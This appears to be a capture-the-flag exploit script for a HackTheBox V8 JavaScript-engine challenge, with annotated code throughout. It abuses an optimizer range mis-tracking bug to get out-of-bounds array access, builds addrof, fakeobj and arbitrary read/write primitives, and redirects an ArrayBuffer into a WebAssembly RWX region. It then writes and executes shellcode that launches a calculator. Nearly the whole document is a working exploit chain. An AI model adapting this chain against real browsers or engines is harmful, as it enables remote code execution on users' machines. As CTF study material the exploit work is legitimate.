Modern Typer - HackTheBox
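// One 8-byte scratch buffer with a double view and a 32-bit-word view on top
// of it. Writing through one view and reading through the other reinterprets
// the bits, which is all ftoi/itof do. Word order follows the host; the
// "u64_buf[0] is the low word" assumption below holds on little-endian hosts.
const buf = new ArrayBuffer(8);
const f64_buf = new Float64Array(buf);
const u64_buf = new Uint32Array(buf);

/**
 * Reinterpret the IEEE-754 bit pattern of a double as an unsigned integer.
 *
 * @param {number} val - the double whose raw bits are wanted
 * @param {32|64} size - 32 returns only the low 32-bit word, 64 the full pattern
 * @returns {bigint} the raw bits as an unsigned BigInt
 * @throws {RangeError} if size is neither 32 nor 64 (previously returned undefined,
 *   which silently became NaN in later arithmetic)
 */
function ftoi(val, size) {
  f64_buf[0] = val;
  const lo = BigInt(u64_buf[0]);
  if (size === 32) {
    return lo;
  }
  if (size === 64) {
    return lo + (BigInt(u64_buf[1]) << 32n);
  }
  throw new RangeError(`ftoi: unsupported size ${size}`);
}

/**
 * Inverse of ftoi: build a double from an integer bit pattern.
 *
 * @param {bigint} val - bit pattern; the low 32 bits (size 32) or low 64 bits
 *   (size 64) are used. With size 32 the high word of the scratch buffer is
 *   left as whatever the previous call stored there.
 * @param {32|64} size
 * @returns {number} the double with those bits
 * @throws {RangeError} if size is neither 32 nor 64 (previously returned a
 *   stale value from the scratch buffer)
 */
function itof(val, size) {
  if (size !== 32 && size !== 64) {
    throw new RangeError(`itof: unsupported size ${size}`);
  }
  u64_buf[0] = Number(val & 0xffffffffn);
  if (size === 64) {
    // Uint32Array storage truncates to 32 bits, so bits above 64 are dropped.
    u64_buf[1] = Number(val >> 32n);
  }
  return f64_buf[0];
}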
// The function the exploit warms up (loop below) until the engine tiers it up.
// The author's inline comments give the value ranges they expect the optimizer
// to track through the Math.abs / Math.max / negate chain; they are not the
// concrete results (with cond=true the chain concretely reaches 1 before the
// shift, and both paths end with value === 10 under plain evaluation). The
// later reads of corr_array[0x0f] and corr_array[0x18] only make sense if the
// returned array ends up longer than those 10 elements, so the exploit
// presumably depends on the challenge's patched engine mis-tracking this range
// during optimization - that cannot be demonstrated from this file alone.
// @param {boolean} cond - true during warm-up; false on the one real call, so x stays NaN
// @returns {[Array, number]} the allocated array and a 1337 marker
function trigger(cond) {
  let x = NaN;
  if(cond)
    x = -Infinity;
  var value = Math.abs(x);
  value = Math.max(value, 0x100); // [0x100, inf]
  value = -value; // [-inf, -0x100]
  value = Math.max(value, -0x101); // [-0x101, -0x100]
  value = -value; // [0x100, 0x101]
  value -= 0x100; // [0x2, 0x3]
  value >>= 1; // NaN >> 1 = 0
  value += 10;
  // Array length derived from the tracked value; in a correct engine this is
  // just a 10-element allocation.
  var array = Array(value);
  array[0] = 1.1;
  return [array, 1337];
}
// Warm-up: ~10k calls with cond=true, presumably so the engine optimizes
// trigger() before the single cond=false call below takes the NaN path.
for(let i = 0; i <= 10000; i++) {
  trigger(true);
}
// Objects allocated right after the warm-up so that they sit near corr_array
// on the heap (inferred from how their slots are indexed below).
var aux_obj = {"a": 1}
// The array from the now-optimized trigger(); indices 0x0f and 0x18 below are
// beyond the 10 elements a correct evaluation would produce.
var corr_array = trigger(false)[0];
var aux_obj_arr = [aux_obj];
var aux_float_arr = [1.1, 2.2, 3.3];
// The high 32 bits of slot 15 and the low 32 bits of slot 24 are treated as the
// V8 map (hidden-class) pointers of the object array and the float array. These
// slot positions are tied to the challenge build's heap layout, not to V8 in general.
var obj_arr_map = ftoi(corr_array[0x0f], 64) >> 32n;
var flt_arr_map = ftoi(corr_array[0x18], 32);
console.log("[+] Object array map: 0x" + obj_arr_map.toString(16));
console.log("[+] Float array map: 0x" + flt_arr_map.toString(16));
// addrof primitive: store `obj` in aux_obj_arr, temporarily overwrite the slot
// that holds aux_obj_arr's map (via the out-of-bounds write at index 0x0f) with
// the float-array map so the element reads back as a double whose bits are the
// object reference, then restore the original map before returning.
// @param {object} obj
// @returns {bigint} the 64-bit pattern read back; callers mask it to 32 bits
function addrof(obj) {
  aux_obj_arr[0] = obj;
  corr_array[0x0f] = itof(flt_arr_map << 32n, 64);
  let addr = aux_obj_arr[0];
  corr_array[0x0f] = itof(obj_arr_map << 32n, 64);
  return ftoi(addr, 64);
}
// fakeobj primitive, the inverse of addrof: write `addr` into aux_float_arr as
// a double, then briefly replace the low half of the slot at index 0x18 (the one
// flt_arr_map was read from) with the object-array map so the element reads
// back as an object reference to `addr`. The high half of that slot is kept
// (backup & 0xffffffff00000000n) and the whole slot is restored afterwards.
// @param {bigint} addr - value to be interpreted as an object reference
// @returns {*} whatever the engine now treats as living at `addr`
function fakeobj(addr) {
  let backup = ftoi(corr_array[0x18], 64);
  let tmp_mem = (backup & 0xffffffff00000000n) + obj_arr_map;
  aux_float_arr[0] = itof(addr, 64);
  corr_array[0x18] = itof(tmp_mem, 64);
  let fake = aux_float_arr[0];
  corr_array[0x18] = itof(backup, 64);
  return fake;
}
// Helper array whose elements are laid out to look like an object header when
// fakeobj() is pointed 0x20 bytes into it (see arb_read/arb_write): element 0
// carries the float-array map bits and element 1 is later overwritten with the
// address to access.
var rw_helper = [itof(flt_arr_map, 64), 1.1, 2.2, 3.3];
// Only the low 32 bits are kept; the addresses handled here are presumably
// compressed heap pointers (the same masking is applied to every addrof result).
var rw_helper_addr = addrof(rw_helper) & 0xffffffffn;
console.log("[+] Controlled RW helper address: 0x" + rw_helper_addr.toString(16));
// Arbitrary 8-byte read. The fake object is built over rw_helper's elements;
// rw_helper[1] then becomes the fake's elements pointer, with the high word
// (8) presumably acting as a length and addr - 8 compensating for the elements
// header, so fake[0] yields the 8 bytes at `addr`. The 0x20 offset is specific
// to the challenge build's object layout.
// @param {bigint} addr
// @returns {bigint} the 64-bit value read
function arb_read(addr) {
  let fake = fakeobj(rw_helper_addr + 0x20n);
  rw_helper[1] = itof((0x8n << 32n) + addr - 0x8n, 64);
  return ftoi(fake[0], 64);
}
// Arbitrary 8-byte write; same fake-object setup as arb_read (the two setup
// lines are duplicated verbatim), then the value is stored through fake[0].
// @param {bigint} addr
// @param {bigint} value - 64-bit pattern to store
function arb_write(addr, value) {
  let fake = fakeobj(rw_helper_addr + 0x20n);
  rw_helper[1] = itof((0x8n << 32n) + addr - 0x8n, 64);
  fake[0] = itof(value, 64);
}
// Minimal WebAssembly module (exports a memory and a function `main`).
// Its only role is to make the engine allocate a code region for the compiled
// wasm, which the log below calls the RWX section.
var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,
130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,
128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,
128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,
0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,0,11]);
var wasm_module = new WebAssembly.Module(wasmCode);
var wasm_instance = new WebAssembly.Instance(wasm_module);
var pwn = wasm_instance.exports.main;
var wasm_instance_addr = addrof(wasm_instance) & 0xffffffffn;
// Pointer to the wasm code region read out of the instance; the 0x68 offset is
// specific to the challenge build.
var rwx = arb_read(wasm_instance_addr + 0x68n);
console.log("[+] Wasm instance address: 0x" + wasm_instance_addr.toString(16));
console.log("[+] RWX section address: 0x" + rwx.toString(16));
// An ArrayBuffer whose backing-store pointer (at offset 0x14 per the read and
// log below) is replaced with the code-region address, so subsequent DataView
// writes land in executable memory instead of the buffer's own storage.
var arr_buf = new ArrayBuffer(0x100);
var dataview = new DataView(arr_buf);
var arr_buf_addr = addrof(arr_buf) & 0xffffffffn;; // trailing ';;' is a harmless empty statement
var back_store_addr = arb_read(arr_buf_addr + 0x14n);
console.log("[+] ArrayBuffer address: 0x" + arr_buf_addr.toString(16));
console.log("[+] Back store pointer: 0x" + back_store_addr.toString(16));
arb_write(arr_buf_addr + 0x14n, rwx);
// Payload written as little-endian 32-bit words; per the log message it only
// launches a calculator as proof of execution. The whole chain hinges on two
// properties of the target build - a writable backing-store pointer and a code
// region that is writable as well as executable - so hardening that removes
// either one breaks it at this point.
var shellcode=[0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,
0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,
0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];
for (let i = 0; i < shellcode.length; i++) {
  dataview.setUint32(4 * i, shellcode[i], true);
}
console.log("[+] Spawning a calculator...");
// Calling the wasm export jumps into the overwritten code region.
pwn();